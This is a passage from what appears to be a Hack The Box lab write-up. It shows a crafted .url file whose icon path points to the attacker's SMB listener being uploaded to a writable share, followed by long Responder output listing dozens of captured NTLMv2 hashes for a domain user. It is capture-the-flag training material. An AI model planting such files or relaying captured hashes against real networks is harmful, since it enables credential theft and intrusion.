  [WIN-8D8QHZ9H2WK] -   Responder Domain Name      [7KFH.LOCAL] -   Responder DCE-RPC Port     [45481] - -[*] Version: Responder 3.2.2.0 -[*] Author: Laurent Gaffie, - -[+] Listening for events... - -[!] Error starting SSL server on port 5986, check permissions or other servers running. -[!] Error starting SSL server on port 443, check permissions or other servers running. -[!] Error starting SSL server on port 636, check permissions or other servers running. -``` - -We can see that Responder can interact with the SMB server. This is maybe a chance to get a vulnerability. - -We'll trap the smbclient by making it parse a .url for which Explorer will parse a folder icon, which will get it straight to our responder : - -```bash ->  cat > /tmp/scrow.url <<'EOF' -[InternetShortcut] -URL=https://hackthebox.com -IconFile=\\10.10.14.12\share\nonexistent.ico -IconIndex=1 -EOF -``` - -```bash ->  smbclient -N //10.129.2.189/share -c 'cd transfer; lcd /tmp; put scrow.url scrow.url; ls' - -putting file scrow.url as \transfer\scrow.url (0.5 kB/s) (average 0.5 kB/s) - .                                   D        0  Sun May 24 15:28:10 2026 - ..                                  D        0  Sun May 24 15:09:51 2026 - claire.pope                         D        0  Thu Feb 17 12:21:35 2022 - diana.pope                          D        0  Thu Feb 17 12:21:19 2022 - julia.wong                          D        0  Thu Apr 17 02:38:12 2025 - scrow.url                           A      103  Sun May 24 15:28:11 2026 - -               7863807 blocks of size 4096. 1562049 blocks available -``` - -And with that, Responder captures the authentication method (which for this version of Windows is NTLMv2-SSP) : - -```bash -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:62db12069409400a:7101E41E7579E2D36CED82EC2A37BE6A:010100000000000080E6583190EBDC016D4D2F2A7DD03B47000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:4d57800cc5ed847b:19FE7C13489C5BB7DE088C7FD1578553:010100000000000080E6583190EBDC013BB62764A1EF16BC000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:f5c89c745b155cfe:BDD08C3E813B55B301F0D976114B2CC8:010100000000000080E6583190EBDC011AB33C8812BAE010000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:f646c421fc8109a0:208E39BF1EEA191F15291DCB90F6F6DE:010100000000000080E6583190EBDC011651DEC2B7A79812000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:e56a3c79e79c74a6:FAD40CD6D36253009D8DA8F5EBFACA93:010100000000000080E6583190EBDC015C70BF400388A6C0000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:ac3dcc0372bcc7ec:CCF0057055C2ECD59AD3ED3D1F47DB3C:010100000000000080E6583190EBDC011CCD68236B7631C1000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:46ceeeb9a90edd34:4CCAC861F620ADD56957751452335A86:010100000000000080E6583190EBDC01D31E1902EF6F87ED000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:f891f879a63aa3c6:22E8799A4790B0A4F7EC5EAFE0EA4F6F:010100000000000080E6583190EBDC0136E9DB6038982E17000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:5ede37c257d42a10:2ABF82934CE7ED574A1A90570EA59526:010100000000000080E6583190EBDC019341DCC9F66D2255000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:24e472966a79692b:95D2ECEC61B20FB255E6042DDA6F3352:010100000000000080E6583190EBDC01E3F00B1456D4CA63000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:8eca012d1b25e37c:F3DA01C627A360E6180B58FC51DD999C:010100000000000080E6583190EBDC01ADBFFDC4B28634A4000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:efca6bdd74c1331c:A793581F11F38D87B8D01DD66238C777:010100000000000080E6583190EBDC0177E35B44F78E7EDE000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:0c4121c15f22e570:E93D6C8134F72E1C111F94580A1864F2:010100000000000080E6583190EBDC0161930C00BA566E14000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:91e54090d9203136:06CBB0C1AD2C4680D926A76FDF1BEF8B:010100000000000080E6583190EBDC01A32A5872C2DF9FA4000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:6a1e0c5295937c54:E4605FB93DFE18C8FAEC638EB6E1320D:010100000000000080E6583190EBDC01C5202B213A661E07000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:396c5434550f631d:C3935A7D6F206EE682D19AB6EFEEAC8E:010100000000000080E6583190EBDC0108024033EDDBA9D5000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:80d1e6548dc94c06:970A7FBB738F58B011430D0E1E000C59:010100000000000080E6583190EBDC0137F7068354BB1EB7000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:ac5fd9c69557f0a1:1BDE6E95755C8A534379AE7D379C7F99:010100000000000080E6583190EBDC01C837885A60F43872000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:c48d8bdb1bce4b37:98E3051010AF295E6A1AEDC3701E0748:010100000000000080E6583190EBDC0141BE32837588D243000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:52827de64c761fbd:8E36059E5BD7D2F6F244ECB93C915C08:010100000000000080E6583190EBDC014A03AEBCEA51DB39000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:e720934efa62f6bd:7261A0B39E0840585A09040C7A9BDD95:010100000000000080E6583190EBDC0164324C99939AB530000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:cea66e4557f242aa:A07E62F6DB04AD0179C930EF846EB1AE:010100000000000080E6583190EBDC014B44A57DF87D8B7A000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:c929facfdcd0e668:A49B1F18737EFCBFEB8F7A45BAF5D6DD:010100000000000080E6583190EBDC01ECD00850C818731A000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:e7dad0c834ea816f:4956C8243628369A083659B8D6EEEC9C:010100000000000080E6583190EBDC019E1A868C9385CFBA000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:341d7aece1d08e69:26AF2D27993F5F0C30A49F73D7DFC1E3:010100000000000080E6583190EBDC01AD977CD87C06CC2D000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:d8518ce5c33d0332:9A08EB81A8A7A986371FB3485E6DFB3B:010100000000000080E6583190EBDC01A0B15C5ED6E55A78000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:c70b0b13a67b8162:32E47B940670078EF2C12E89E6E1BC19:010100000000000080E6583190EBDC0135FCA977D34D1C4B000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:1aa3f159b0164dab:ABEFB1D004070BCF07DE28D8A434BEFE:010100000000000080E6583190EBDC0191D9C5E55835CA3D000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:bae4e448601aae5d:E81D6B2AD2752D9E8F6929CFBA50EFD5:010100000000000080E6583190EBDC0183A35D3EE162FA93000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:070ee77e0310f2c5:92A27B3975FC65634A0C20ECB18A9AF5:010100000000000080E6583190EBDC01AEF369483F82906B000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:a240962c199d10a7:21BAE007073AF6964661FF96E17C9E14:010100000000000080E6583190EBDC017C9C999DD4B03E47000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:eff80d1b066ca496:0188105D54BEE0659B3BA09E3E603878:010100000000000080E6583190EBDC01D2C202D94C1CAAF9000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:52016dc6368541cd:887488ACCC8FE096B3A9307BFE4B01FA:010100000000000080E6583190EBDC01D92A6ABB4E58B9F3000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:76a7492f301d537b:D79BB4DEFFB8722402ADBA2FB9D31EF3:010100000000000080E6583190EBDC01C0E1E90FC7CC5CAF000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:f2830c8570fd2909:EB3135B98432A95603E6A7D41D3F54E0:010100000000000080E6583190EBDC01006930392349E2AC000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 